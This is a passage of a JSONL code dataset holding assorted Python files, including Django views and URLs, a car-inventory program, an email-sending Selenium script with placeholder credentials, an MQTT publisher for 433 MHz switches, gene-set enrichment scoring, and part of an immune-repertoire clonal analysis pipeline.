BaseMake\nfrom redsolutioncms.models import CMSSettings\nfrom sandbox.models import SandboxSettings\n\nclass Make(BaseMake):\n def make(self):\n super(Make, self).make()\n cms_settings = CMSSettings.objects.get_settings()\n sandbox_settings = SandboxSettings.objects.get_settings()\n cms_settings.render_to(['..', 'media', 'css', 'style.css'], 'sandbox/redsolutioncms/style.css', {\n 'sandbox_settings': sandbox_settings,\n })\n cms_settings.render_to(['..', 'templates', 'base.html'], 'sandbox/redsolutioncms/base.html', {\n 'sandbox_settings': sandbox_settings,\n }, 'w')\n","sub_path":"sandbox/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237951557","text":"# you have already created UserSerializer\nfrom .serializers import CustomUserSerializer\n\n\ndef jwt_response_payload_handler(token, user=None, request=None):\n user = CustomUserSerializer(user, context={'request': request}).data\n return {\n 'token': token,\n 'user_name': user['user_name'],\n 'is_staff': user['is_staff'],\n }\n","sub_path":"spareparts_backend/crushing_spareparts/users/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576380894","text":"class Car():\r\n def __init__(self,registration, make):\r\n self.__mileage__ = 0\r\n self.__registration__ = registration\r\n self.__make__ = make\r\n self.__dateOfInspection__ = None\r\n self.__year__ = str((self.__registration__[2] + self.__registration__[3]))\r\n\r\n\r\n def getYear(self):\r\n if self.__year__[0] == '5' or self.__year__[0] == '6':\r\n self.__year__= int(self.__year__)-50\r\n return self.__year__\r\n \r\n def getRegistration(self):\r\n return self.__registration__\r\n \r\n def getMake(self):\r\n return self.__make__\r\n \r\n def getMileage(self):\r\n return self.__mileage__\r\n \r\n def getDateOfInspection(self):\r\n return self.__dateOfInspection__\r\n\r\n def setInspectionData(self, mileage, dateOfInsp):\r\n self.__mileage__ = mileage\r\n self.__dateOfInspection__ = dateOfInsp\r\n\r\n\r\n def needNewCar(self):\r\n self.getYear()\r\n if int(self.__year__)< 14:\r\n return True\r\n else:\r\n return (19-int(self.__year__))\r\n \r\n\r\ndef menu():\r\n print('1. To input new car details')\r\n print('2. To print details')\r\n print('3. To check if you need a new car')\r\n print('4. To view all cars')\r\n print('0. To exit')\r\n print()\r\n choice = input('Enter option: ')\r\n while True:\r\n try:\r\n choice = int(choice)\r\n break\r\n except ValueError:\r\n print('\\nPlease enter a valid option')\r\n choice = input()\r\n return choice\r\n\r\ndef details(cars):\r\n print()\r\n allCars(cars)\r\n print()\r\n car = input('Which car do you want to check? ')\r\n try:\r\n car=cars.get(int(car))\r\n except ValueError:\r\n car=cars.get(car)\r\n while True:\r\n try:\r\n print('\\nYour registration is: ',car.getRegistration())\r\n print('Your make is: ',car.getMake())\r\n print('Your mileage is: ',car.getMileage())\r\n print('Your date of inspection is: ',car.getDateOfInspection())\r\n break\r\n except AttributeError as e:\r\n #print(e)\r\n print('\\nPlease enter a valid car name from the list below')\r\n allCars(cars)\r\n car = input()\r\n car = cars.get(car)\r\n\r\ndef allCars(cars):\r\n for key,value in cars.items():\r\n print(key ,':' ,value.getMake(),',',value.getRegistration())\r\n print()\r\n \r\n \r\n\r\ndef addCar():\r\n reg = input('Enter reg: ')\r\n name = input('Enter name: ')\r\n newCar = Car(reg,name)\r\n inspData = input('Set inspection data?Y or N ')\r\n if inspData == 'Y':\r\n miles = input('Enter no. of miles: ' )\r\n date = input('Enter date of inspection: ')\r\n newCar.setInspectionData(miles,date)\r\n \r\n return name, newCar\r\n \r\ndef main():\r\n cars = 0\r\n car1 = Car('BL17 WFR', 'toyota aygo')\r\n car1.setInspectionData(5000, '03/07/18')\r\n carDict = {'default':car1}\r\n\r\n option = menu()\r\n while option != 0:\r\n if option ==1:\r\n name, newCar= addCar()\r\n cars +=1\r\n carDict.update({cars: newCar})\r\n if option == 2:\r\n details(carDict)\r\n if option == 3:\r\n if car1.needNewCar() == True:\r\n print('You need a new car')\r\n else:\r\n remainingYrs = car1.needNewCar()\r\n print('Your car is fine: You have',remainingYrs,'years remaining')\r\n if option == 4:\r\n allCars(carDict)\r\n print()\r\n option = menu()\r\n print('goodbye')\r\n \r\nmain ()\r\n\r\n\r\n","sub_path":"car program v3.py","file_name":"car program v3.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9305415","text":"# %load q03_pearson_correlation/build.py\r\n# Default Imports\r\nimport pandas as pd\r\nimport numpy as np\r\ndataframe_1 = pd.read_csv('data/house_prices_multivariate.csv')\r\ndataframe_2 = pd.read_csv('data/house_prices_copy.csv')\r\n\r\ndef correlation():\r\n x=dataframe_1['SalePrice']\r\n y=dataframe_2['SalePrice']\r\n return np.corrcoef(x,y)[0,1]\r\n# Rurn the correlation value between the SalePrice column for the two loaded datasets\r\n# Your code here\r\n#correlation()\r\n","sub_path":"q03_pearson_correlation/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"486318140","text":"from threading import local\n\n\ndefault_app_config = 'models_logging.apps.LoggingConfig'\n\n\nclass _Local(local):\n \"\"\"\n :param stack_changes: all changes grouped by (object_id, content_type_id)\n it's created for grouping changes that called by multiple using of obj.save() per 1 request|operation\n \"\"\"\n def __init__(self):\n self.user = None\n self.ignore_changes = False\n self.stack_changes = {}\n\n def ignore(self, sender, instance):\n if isinstance(self.ignore_changes, (tuple, list)) and sender in self.ignore_changes:\n return True\n elif self.ignore_changes is True:\n return True\n elif instance.get_deferred_fields():\n # if does'nt ignore defered_fields\n # we will catch excpetion (max recursion depth)\n return True\n\n\n_local = _Local()","sub_path":"models_logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"575333554","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('info', views.info, name='info'),\n path('maintanence', views.maintanence, name='maintanence'),\n path('pay', views.pay, name='pay'),\n path('portal', views.dashboard, name='dashboard'),\n path('login', views.login, name='login'),\n path('', views.index, name='index')\n\n]","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507686912","text":"#-------------------------------------------------------------------------------\n# Name: test_log_entry\n# Purpose: Validating that log_entry works as expected\n#\n# Author: Rudy\n#\n# Created: 30/11/2013\n#-------------------------------------------------------------------------------\n\nimport unittest\nfrom .log_entry import LogEntry, dateFormatRotation\n\nlogEntry1=\"192.168.1.3 - - [30/11/2013:11:59:14 +0100] \\\"PUT /api/browse/date\\\" 301 2297\"\nlogEntry2=\"192.168.1.3 - - [30/11/2013:11:59:14 -0000] \\\"PUT /blog/december/30 HTTP/1.1\\\" 301 2297\"\nlogEntry3=\"192.168.1.3 - - [30/11/2013:11:59:14 -0100] \\\"PUT /blog/december/30\\\" 301 2297\"\n\nclass test_log_entry(unittest.TestCase):\n\n def testInit(self):\n entry= LogEntry(logEntry1)\n self.assertEqual(entry.section,\"api\")\n self.assertEqual(entry.epoch,1385809154)\n\n entry = LogEntry(logEntry2)\n self.assertEqual(entry.section,\"blog\")\n self.assertEqual(entry.epoch,1385812754)\n\n entry = LogEntry(logEntry3)\n self.assertEqual(entry.section,\"blog\")\n self.assertEqual(entry.epoch,1385816354)\n\n def test_dateFormatRotation(self):\n formats=dateFormatRotation()\n generator=formats.formatStorage()\n self.assertEqual(next(generator),\"%d/%m/%Y %H:%M:%S\")\n self.assertEqual(next(generator),\"%d/%m/%Y %H:%M:%S\")\n formats.changeFormat()\n self.assertEqual(next(generator),\"%d/%m/%Y:%H:%M:%S\")\n formats.changeFormat()\n formats.changeFormat()\n self.assertEqual(next(generator),\"%d/%m/%Y %H:%M:%S\")\n\n\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()\n","sub_path":"log_monitor/test_log_entry.py","file_name":"test_log_entry.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"199075309","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver #(1)WEB操作、学習中 :pip install \nimport chromedriver_binary #(1)WEB操作、学習中\n#pip install chromedriver-binary==87.0.4280.88.0 #バージョンをインストール済みChromeと合わせる\nimport time #(2)\nimport datetime #(2)\n#driver = webdriver.Firefox() #(1)\n#driver.get(\"http://www.google.com\") #(1)\n#driver.execute_script(\"document.getElementById('lga').style.display = 'none';\") #(1)\n#(0)Webスクレイピング、学習済\nfrom bs4 import BeautifulSoup\nimport requests\n#(0)メール、学習済\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.utils import formatdate\nimport ssl\n#----------------------------------------さぁ、始めましょう----------------------------------------------\n#(0)メール、学習済\nFROM_ADDRESS = '(指定する)'\nMY_PASSWORD = '(指定する)'\nTO_ADDRESS = '(指定する)'\nBCC = '' \nSUBJECT = 'GmailのSMTPサーバ経由'\n#mail body\nBODY = 'pythonでメール送信 \\n'\n#ファイル記入内容をメール送信ーーーーーーーー追加\nf = open(\"(指定する)/xx.txt\",\"r\") #★変更可能 #r:read\nfor line in f:\n print(line)\n BODY += '\\n'+line\n\n\ndef create_message(from_addr, to_addr, bcc_addrs, subject, body):\n msg = MIMEText(body)\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n msg['Bcc'] = bcc_addrs\n msg['Date'] = formatdate()\n \n \n\n msg['Body'] = body\n\n return msg\n\n\ndef send(from_addr, to_addrs, msg):\n #context = ssl.create_default_context()\n smtpobj = smtplib.SMTP_SSL('smtp.gmail.com', 465, timeout=10)\n smtpobj.login(FROM_ADDRESS, MY_PASSWORD)\n smtpobj.sendmail(from_addr, to_addrs, msg.as_string())\n smtpobj.close()\n\n#メール送信をする ~send\nif __name__ == '__main__':\n\n to_addr = TO_ADDRESS\n subject = SUBJECT\n body = BODY\n\n msg = create_message(FROM_ADDRESS, to_addr, BCC, subject, body)\n send(FROM_ADDRESS, to_addr, msg,) #以上です。\n\n\n#DateTime\nnow = datetime.datetime.now()\n#now.year+\n\n#file\nf = open(\"(指定する)/(フォルダ名))\"+str(now.year)+str(now.month)+str(now.day)+str(now.hour)+str(now.minute)+str(now.second)+\".html\",\"a\")\n# f.write(str(now))\n#以上です。27get\n\n#1st.\n#URLを受け取りhtmlを返す\ndef url_to_soup(url):\n # レスポンスオブジェクトを取得\n response = requests.get(url)\n # encoding=>utf-8\n response.encoding = response.apparent_encoding\n # レスポンステキストを変数htmlに格納\n html=response.text\n # BeautifulSoupをhtml形式テキストで初期化、\n return BeautifulSoup(html, 'html.parser') # BeautifulSoupの初期化\n\n\n#url=\"https://ja.wikipedia.org/wiki/メインページ\"\nurl=\"https://ja.wikipedia.org/wiki/特別:新しいページ\"\n# url=\"\"\n# url=\"\"\n# url=\"\"\n#soup=url_to_soup(url) # url文字列からhtml形式テキスト返却\n#f.write(str(soup))\n\n\n\n#myEDIT.\n#mw-parser-output #<p><a> #<----*これをstyle=\"opacity:0.5;\"---->\n#mw-parser-output #<p><a> #<----*これをstyle=\"opacity:1;\"---->\n#mw-parser-output #<p><a> #<----*これをstyle=\"onClick=class\"---->\n# driver = webdriver.Chrome()\n# driver.get('https://www.google.com/')\n# time.sleep(2)\n# search_box = driver.find_element_by_name(\"q\")\n# #search_box.send_keys('ChromeDriver')\n# search_box.send_keys('クイズ 2020年12月')\n# search_box.submit()\n# time.sleep(600)\n# driver.quit()\n# driver = webdriver.Chrome()\n# driver.get(\"http://www.google.com\")\n# driver.execute_script(\"document.getElementById('lga').style.display = 'none';\")\n\n\n","sub_path":"5th_selenium.py","file_name":"5th_selenium.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"258447007","text":"import ast \nimport pandas as pd\nimport numpy as np\n\n\n'''\n***THIS IS A PRELIMINARY SCRIPT - AT A LATER DATE THIS SECTION OF THE PROJECT WILL OCCUPY ITS OWN JUPYTER NOTEBOOK***\n\n\n\nMany of the fields in the GiantBomb API query results are formatted as json references to separate API resources. Since querying the full content of those resources is beyond the scope of this project and would constitute undue strain\non GiantBomb's api, here we will simply pull relevant details out of the json string and export them to their own .csvs. Because these will come from the data we have queried for this project, this will not be a complete representation\nof the data hosted on GiantBomb, but rather a catalog of the field values appearing in this project's data.\n\nHere we will identify the columns we want to parse, convert the json strings to dicts, pull out the relevant info, and replace the values in the source dataframe/csv/table with the id reference to cut down on redundancy.\n\n'''\n\n\n\n\ndef parse_json(in_df, fields):\n\n #games details - future goal is to make this function generic so that it can be run against all api query csvs\n for field in fields: #columns from data source that are formatted as api references\n \n out_df = pd.DataFrame()\n for idx in in_df.index: #needs to be run for each record to capture all unique values for each field\n \n item_list = []\n \n\n \n json_string = in_df.loc[idx][field]\n \n try:\n json_eval = ast.literal_eval(json_string) #returns json object as python dict\n except:\n continue\n\n #replace api references in source data with python list of unique ids, append record dicts to output dataframe\n for item in json_eval:\n item_list.append(item['id'])\n out_df = out_df.append(item, ignore_index=True)\n \n in_df.at[idx, field] = item_list\n\n \n out_df.drop_duplicates().to_csv('./data/' + field + '.csv', index=False) #only export unique records\n\n return in_df\n\n\n\n\n\ndef main():\n \n df = pd.read_csv('./data/game_details.csv')\n field_list = ['platforms', 'franchises', 'developers']\n parsed_df = parse_json(df, field_list)\n parsed_df.to_csv('./data/game_details_parsed.csv', index=False)\n\nmain()\n","sub_path":"data_wrangling/parse_json_columns.py","file_name":"parse_json_columns.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319288752","text":"from matplotlib.pyplot import figure, gca, show\nfrom numpy import abs, asarray, in1d, where\n\n\ndef compute_enrichment_score(gene_scores,\n gene_set_genes,\n power=1,\n statistic='auc',\n plot=False):\n \"\"\"\n Compute how much gene scores enrich gene-set genes.\n Arguments:\n gene_scores (Series): (n_genes_with_score); sorted and indexed by gene\n gene_set_genes (iterable): (n_genes)\n power (number): power to raise gene_scores\n statistic (str): 'auc' (area under curve) | 'ks' (Kolmogorov-Smirnov)\n plot (bool): whether to plot the mountain plot\n Returns:\n float: enrichment score\n \"\"\"\n\n gene_scores = gene_scores.sort_values(ascending=False)\n\n in_ = in1d(gene_scores.index, gene_set_genes, assume_unique=True)\n\n if power != 1:\n gene_scores = abs(asarray(gene_scores))**power\n\n in_int = in_.astype(int)\n hit = (gene_scores * in_int) / gene_scores[in_].sum()\n miss = (1 - in_int) / (in_.size - in_.sum())\n y = hit - miss\n\n cumulative_sums = y.cumsum()\n\n if statistic == 'auc':\n enrichment_score = cumulative_sums.sum()\n\n elif statistic == 'ks':\n max_ = cumulative_sums.max()\n min_ = cumulative_sums.min()\n enrichment_score = where(abs(min_) < abs(max_), max_, min_)\n\n else:\n raise ValueError('Unknown statistic: {}.'.format(statistic))\n\n if plot:\n figure(figsize=(8, 5))\n ax = gca()\n ax.plot(range(in_.size), in_, color='#808080', alpha=0.16)\n ax.plot(range(in_.size), y, color='#9017E6')\n ax.plot(range(in_.size), cumulative_sums, color='#20D9BA')\n show()\n\n return enrichment_score\n","sub_path":"gsea/compute_enrichment_score.py","file_name":"compute_enrichment_score.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"90607452","text":"#!/usr/bin/python\n#from gpiozero import MotionSensor\nfrom time import sleep\nimport paho.mqtt.client as mqtt, time, sys\nimport os\nimport re\nimport threading\nimport subprocess\nfrom array import array\nMQTT_PASSWORD=\"MY_PASSWORD\"\nMQTT_USER=\"MY_USER\"\n\n#motion = MotionSensor(4, pull_up=None, active_state=True, sample_rate=4)\nRF_STATE_TOPIC=\"homeassistant/binary_sensor/switch{}/state\"\nprint(\"Start\")\n#p = subprocess.Popen(['/home/pi/rc-switch-pi-examples/receivedemo', ''], stdout=subprocess.PIPE, shell=True)\n#process.Popen(['/usr/local/bin/receiveRf400', ''], stderr=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)\nRF_COMMAND=\"/usr/local/bin/receiveRf400\"\n#p = subprocess.Popen(['ls', '-l'], stdout=subprocess.PIPE, shell=True)\nglobal popen\nglobal detectedSwitches \ndetectedSwitches = array('l')\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected\")\n client.is_connected = True\n\ndef on_message(client, userdata, message):\n print(\"Message\")\n\ndef publishMotion():\n global detected\n\nserverIp=\"192.168.1.2\"\nclient = mqtt.Client()\n# if you need a username and/or password for mqtt uncomment next line\nclient.username_pw_set(MQTT_USER, password=MQTT_PASSWORD)\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.is_connected = False\nclient.loop_start()\nclient.connect(serverIp) # replace \"control_central\" with ip address or name of server\n\ndef newSwitchDetected(number):\n topic=\"homeassistant/binary_sensor/switch{}/config\".format(number)\n stateTopic=\"{{\\\"name\\\": \\\"switch{}\\\", \\\"state_topic\\\":\\\"\"+RF_STATE_TOPIC+\"\\\" }}\"\n stateTopic=stateTopic.format(number, number)\n sys.stdout.write(stateTopic+\"\\n\")\n sys.stdout.write(topic+\"\\n\")\n client.publish(topic,stateTopic, retain=True)\n\ndef checkForNewSwitch(number):\n if not number in detectedSwitches:\n sys.stdout.write(\"New switch: \"+str(number)+\"\\n\")\n detectedSwitches.append(number)\n newSwitchDetected(int(number))\n\ndef execute(cmd):\n popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)\n for stdout_line in iter(popen.stdout.readline, \"\"):\n stdout_line.split()\n splitted=stdout_line.split()\n #sys.stdout.write(\"Length: \"+str(len(splitted)))\n if len(splitted) == 2:\n checkForNewSwitch(int(splitted[0]))\n sys.stdout.write(\"Switch\"+splitted[0]+\" Value:\"+splitted[1]+\"\\n\")\n topic=RF_STATE_TOPIC.format(splitted[0])\n client.publish(topic,\"ON\" if splitted[1] == \"1\" else \"OFF\", retain=True)\n #client.publish(topic,splitted[1], retain=True)\n #yield stdout_line \n popen.stdout.close()\n return_code = popen.wait()\n if return_code:\n raise subprocess.CalledProcessError(return_code, cmd)\n\ndef cleanup():\n#client.publish(\"homeassistant/binary_sensor/raspbiMotion/config\",'', retain=True)\n client.loop_stop()\n client.disconnect()\n popen.kill()\n\n#execute(\"/home/pi/rc-switch-pi-examples/receive\")\nfor path in execute([RF_COMMAND,\"\"]):\n print(path, end=\"\")\nwhile True:\n checkForNewSwitch(int(\"10\"))\n time.sleep(1)\n\natexit.register(cleanup)\n\n","sub_path":"rf433Detection.py","file_name":"rf433Detection.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"394569698","text":"#!/usr/bin/env python3\nimport os, re, sys, logging, csv, multiprocessing\n\nimport pandas as pd\nfrom HTGTSrep.mutprofile import profile_Protein, stat_Protein\nfrom HTGTSrep.lib import getDNADistMatrix, calcDistances, formClusters, \\\n hier_clust, collapse_db, profile_DNAmut, getInputSeq, \\\n getInferSeq, profile_DNAmut_clonal, profile_DNAmut_clonal_errbar\nfrom scipy.stats import sem\n\ndef define_clones(records, args):\n '''\n Pre-group records based on V, J and junction length\n '''\n if args.cluster_by_gene:\n records['J_GENE'] = records['J_ALLELE'].str.split('*').str[0]\n ### 09242020 added 'V_ALLELE' to grouped = records.groupby(['V_ALLELE', 'J_GENE', 'JUNCTION_LENGTH'])\n grouped = records.groupby(['V_GENE', 'J_GENE', 'JUNCTION_LENGTH'])\n else:\n ### 09242020 added 'V_ALLELE' to grouped = records.groupby(['V_ALLELE', 'J_GENE', 'JUNCTION_LENGTH'])\n grouped = records.groupby(['V_ALLELE', 'J_ALLELE', 'JUNCTION_LENGTH'])\n records['clonetmp'] = '-'\n records['CLONE'] = '-'\n for key, group in grouped:\n if len(group) == 1:\n ### 09152020 Lawrence: updated from records.ix to records.loc\n records.loc[group.index, 'clonetmp'] = group['SEQUENCE_ID']\n else:\n clonelist = hier_clust(group, args.dist)\n ### 09162020 Lawrence: updated from records.set_value(group.index, 'clonetmp', clonelist)\n ### to records.at[group.index, 'clonetmp'] = clonelist\n records.at[group.index, 'clonetmp'] = clonelist\n clone_num = 1\n for key, group in records.groupby('clonetmp'):\n ### 09152020 Lawrence: updated from records.ix to records.loc\n records.loc[group.index, 'CLONE'] = clone_num\n clone_num += 1\n records.drop('clonetmp', inplace=True, axis=1)\n records.sort_values('CLONE', ascending=True, inplace=True)\n return records\n\ndef write_cloneDb(records, outputfile, args):\n droplist = [\"V_BTOP\", \"STRAND\",\n 'D_SEQ_START', 'D_SEQ_LENGTH', 'D_GERM_START', 'D_GERM_LENGTH',\n 'J_SEQ_START', 'J_SEQ_LENGTH', 'J_GERM_START', 'J_GERM_LENGTH',\n \"NP1_LENGTH\", \"NP2_LENGTH\",\n \"V_SEQ_START\", \"V_SEQ_LENGTH\", \"V_GENE_LEN\", \"V_GENE_GAP_LEN\",\n \"V_GERM_START_VDJ\", \"V_GERM_END_VDJ\",\n \"V_GERM_START_IMGT\",\n \"V_ALLELE_NUC\", \"GERMLINE_IMGT_D_MASK\",\n \"SEQUENCE_INPUT\", \"SEQUENCE_VDJ\"]\n records_output = records.drop(droplist, axis=1)\n records_output.to_csv(outputfile, sep=\"\\t\", index=False)\n\ndef AAprofile_clones(group, sample, args):\n ''' Do protein profiling\n '''\n clone = group['CLONE'].values[0]\n protein_file = \"%s/%s_clonal/protein_text/%s.clone%d.%s.%s.protein.txt\" % (\n args.outdir, sample, sample, clone, args.muttype, args.productivetype)\n protein_file = re.sub(r'[*)(]', '-', protein_file)\n protein_PDF = \"%s/%s_clonal/protein_profile/%s.clone%d.%s.%s.eps\" % (\n args.outdir, sample, sample, clone, args.muttype, args.productivetype)\n protein_PDF = re.sub(r'[*)(]', '-', protein_PDF)\n Vgapseq = getInputSeq(args.__dict__['params_dict']['Vgapseq'])\n reads_db = profile_Protein(group, protein_file, protein_PDF, Vgapseq, args)\n stat_file = \"%s/%s_clonal/protein_text/%s.clone%d.%s.%s.protein.txt\" % (\n args.outdir, sample, sample, clone, args.muttype, args.productivetype)\n stat_Protein(protein_file, Vgapseq, group['V_ALLELE'].values[0], reads_db)\n\ndef DNAprofile_clones(group, sample, args, profileType):\n \"\"\"\n Generate DNA and Protein mutation profiles for clones\n \"\"\"\n clone = group['CLONE'].values[0]\n V_ALLELE = group['V_ALLELE'].values[0]\n if profileType == 'sepCluster':\n dirprefix = \"%s/%s_clonal\" % (args.outdir, sample)\n elif profileType == 'mixCluster':\n dirprefix = \"%s/allsample_clonal\" % args.outdir\n\n nuc_profile = \"%s/nucl_text/clone%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, clone, sample, args.muttype, args.productivetype)\n nuc_stat = \"%s/nucl_text/clone%s_%s.%s.%s.%s.stat.txt\" % (\n dirprefix, clone, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_PDF = \"%s/nucl_profile/clone%s.%s.%s.%s.pdf\" % (\n dirprefix, clone, sample, args.muttype, args.productivetype)\n\n profile_DNAmut(group, nuc_stat, nuc_PDF, nuc_profile, args)\n\ndef DNAprofile_clones_errbar(group, sample_errbar, args):\n ''' Collect stat data from diff samples\n '''\n clone = group['CLONE'].values[0]\n allele = group[\"V_ALLELE\"].values[0]\n dirprefix = \"%s/allsample_clonal/\" % args.outdir\n sample_files = {}\n for sample in sample_errbar:\n nuc_PDF = \"%s/nucl_profile/clone%s.%s.%s.%s.pdf\" % (\n dirprefix, clone, sample, args.muttype, args.productivetype)\n nuc_stat = \"%s/nucl_text/clone%s_%s.%s.%s.%s.stat.txt\" % (\n dirprefix, clone, allele, sample, args.muttype, args.productivetype)\n sample_files[sample] = [nuc_PDF, nuc_stat]\n ### print to find if the correct file paths are generated. trying to solve missing stat file\n # print(\"finding \", sample_files[sample],file = sys.stderr)\n nuc_PDF_errbar = \"%s/nucl_profile_errbar/clone%s.%s.%s.errbar.pdf\" % (\n dirprefix, clone, args.muttype, args.productivetype)\n nuc_stat_errbar = \"%s/nucl_text_errbar/clone%s_%s.%s.%s.stat.errbar.txt\" % (\n dirprefix, clone, allele, args.muttype, args.productivetype)\n\n # Load CDR3\n if allele in args.__dict__['V_CDR']:\n cdr = args.__dict__['V_CDR'][allele]\n cdrstring = 'cdr1_start=%s cdr1_end=%s cdr2_start=%s cdr2_end=%s ' \\\n 'cdr3_start=%s cdr3_end=%s' % (cdr[0], cdr[1], cdr[2],\n cdr[3], cdr[4], cdr[5])\n else:\n cdrstring = ''\n\n if len(sample_errbar) == 1:\n nuc_PDF_sample = sample_files[sample_errbar[0]][0]\n print(\"DNAprofile_clones_errbar did not output a file, because len(sample_errbar) == 1\", file = sys.stderr)\n # if os.path.exists(nuc_PDF_sample):\n # os.system('cp %s %s' % (nuc_PDF_sample, nuc_PDF_errbar))\n else:\n stat_list = []\n for sample in sample_files:\n stat = pd.read_csv(sample_files[sample][1], sep=\"\\t\")\n stat_list.append(stat)\n stat_all = pd.concat(stat_list, ignore_index=True)\n\n pos_max = stat_all['Pos'].max()\n statcols = list(stat_all) + ['Err']\n stat_new = pd.DataFrame(columns=statcols, dtype='int64')\n stat_new = stat_new.astype('int64')\n stat_new['Base'] = stat_new['Base'].astype('str')\n stat_new['Y'] = stat_new['Y'].astype('float')\n for i in range(1, pos_max+1):\n group = stat_all.loc[stat_all['Pos']==i]\n Pos = i\n Mut = group['Mut'].sum()\n Total = group['Total'].sum()\n Base = list(group['Base'])[0]\n A = group['A'].sum()\n T = group['T'].sum()\n C = group['C'].sum()\n G = group['G'].sum()\n\n group_Y = group[group['Total']>0]\n Err = 0\n if len(group_Y) == 0: Y = 0\n else: Y = group_Y['Y'].sum()/len(group_Y)\n if len(group_Y) > 1:\n Err = sem(group_Y['Y'])\n stat_new.loc[i] = [int(Pos), int(Mut), int(Total), str(Base), Y,\n int(A), int(T), int(C), int(G), Err]\n stat_new.to_csv(nuc_stat_errbar, sep=\"\\t\", index=False)\n if not args.skipTree:\n os.system('Rscript %s/HTGTSrep/R/SHMPlot2.R %s %s plotrows=1 figureheight=2 '\n 'showsequence=FALSE ymax=0.75 %s ' % (args.scriptdir,\n nuc_stat_errbar, nuc_PDF_errbar, cdrstring))\n\ndef Tree_clones(records, sample, args, sample_errbar=[]):\n ''' Parsing records and construct lineage Tree\n '''\n records_Dmask = records.copy()\n records_tree = records.copy()\n records_Dmask['Dmask_N'] = [seq.count('N') for seq in records['GERMLINE_IMGT_D_MASK']]\n records_Dmask['SEQUENCE_IMGT_LENGTH'] = records_Dmask['SEQUENCE_IMGT'].apply(len)\n records_Dmask.sort_values('Dmask_N', ascending=False, inplace=True)\n\n clone_seqlongest = {}\n for key, group in records_Dmask.groupby('CLONE'):\n # Use GERMLINE_IMGT_D_MASK with most 'N' as consensus one\n seq_Dmask = group['GERMLINE_IMGT_D_MASK'].values[0]\n records_tree.loc[records_tree['CLONE']==key, 'GERMLINE_IMGT_D_MASK'] = seq_Dmask\n\n # padding shorter SEQUENCE_IMGT to the longest length or trim it by the germline seq length\n seq_IMGT_longest = group['SEQUENCE_IMGT_LENGTH'].max()\n for index, row in group.iterrows():\n padding_length = seq_IMGT_longest - row['SEQUENCE_IMGT_LENGTH']\n SEQUENCE_ID = row['SEQUENCE_ID']\n SEQUENCE_IMGT = row['SEQUENCE_IMGT'] + 'N' * padding_length\n SEQUENCE_IMGT = SEQUENCE_IMGT[0:len(seq_Dmask)]\n records_tree.loc[records_tree['SEQUENCE_ID']==SEQUENCE_ID, 'SEQUENCE_IMGT'] = SEQUENCE_IMGT\n\n # Get lineage tree from collapsed records\n ### these two statements help find keyError\n # print(\"sample in treeClone =\",sample,file=sys.stderr)\n # print(\"have allcolumns before collapse?\", len(records_tree[\"SEQUENCE_INPUT\"]))\n records_collapse = collapse_db(records_tree, 'partial', 'F')\n records_collapse['DUPCOUNT'] = 1\n for index, row in records_collapse.iterrows():\n readlist = row['DUPREAD'].split(',')\n records_collapse.loc[index, 'DUPCOUNT'] = len(readlist)\n if sample != 'allsample':\n records_collapse.loc[index, 'SHORTCOUNT'] = 's1:%d' % len(readlist)\n records_collapse.loc[index, 'SAMPLECOUNT'] = '%s:%d' % (sample, len(readlist))\n else:\n sample_order = list(args.__dict__['sample_path'].keys())\n sample_num = len(sample_order)\n samples = [records[records['SEQUENCE_ID']==read]['SAMPLE'].item() for read in readlist]\n SAMPLECOUNT = '|'.join(['%s:%d' % (sample, samples.count(sample)) \\\n for sample in sample_order])\n SHORTCOUNT = '|'.join(['s%d:%d' % (i+1, samples.count(sample_order[i])) \\\n for i in range(0, sample_num)])\n records_collapse.loc[index, 'SAMPLECOUNT'] = SAMPLECOUNT\n records_collapse.loc[index, 'SHORTCOUNT'] = SHORTCOUNT\n records_collapse.sort_values('CLONE', ascending=True, inplace=True)\n\n select_Output = [\"SEQUENCE_ID\", \"V_CALL\", \"J_CALL\", \"CLONE\", \"SAMPLE\", \"DUPCOUNT\",\n \"SHORTCOUNT\", \"SAMPLECOUNT\", \"JUNCTION_LENGTH\", \"CDR3_SEQ\", \"SEQUENCE_IMGT\",\n \"GERMLINE_IMGT_D_MASK\"]\n records_Output = records_collapse[select_Output]\n file_collapse = \"%s/%s_clonal/s_clonal%s.collapse.xls\" % (args.outdir, sample, sample)\n records_Output.to_csv(file_collapse, 